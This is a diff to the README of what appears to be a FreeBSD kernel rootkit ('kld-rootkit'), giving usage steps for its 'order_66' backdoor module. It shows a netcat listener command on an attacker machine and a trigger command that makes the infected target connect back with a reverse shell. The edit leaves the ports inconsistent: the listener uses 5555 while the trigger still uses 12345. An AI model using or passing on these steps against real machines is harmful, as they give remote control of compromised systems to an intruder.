mrg0ne/kld-rootkit/README.md

  5. The port that the listener is on

 netcat (nc) can be used to listen for the inbound connection

-#### Example:

-For a reverse shell to our target running the order_66 kernel module on *192.168.1.123*

-Start a listener with netcat on *192.168.1.250* and port *12345*
+For a reverse shell to our target running the order_66 kernel module on *192.168.1.123* start a listener with netcat on *192.168.1.250* and port *5555*

-    nc -lnvp 12345
+    nc -lnvp 5555

-From anywhere, run the trigger program:
+To activate the backdoor from any FreeBSD system, run the trigger program:

     ./bin/trigger 192.168.1.123 192.168.1.250 12345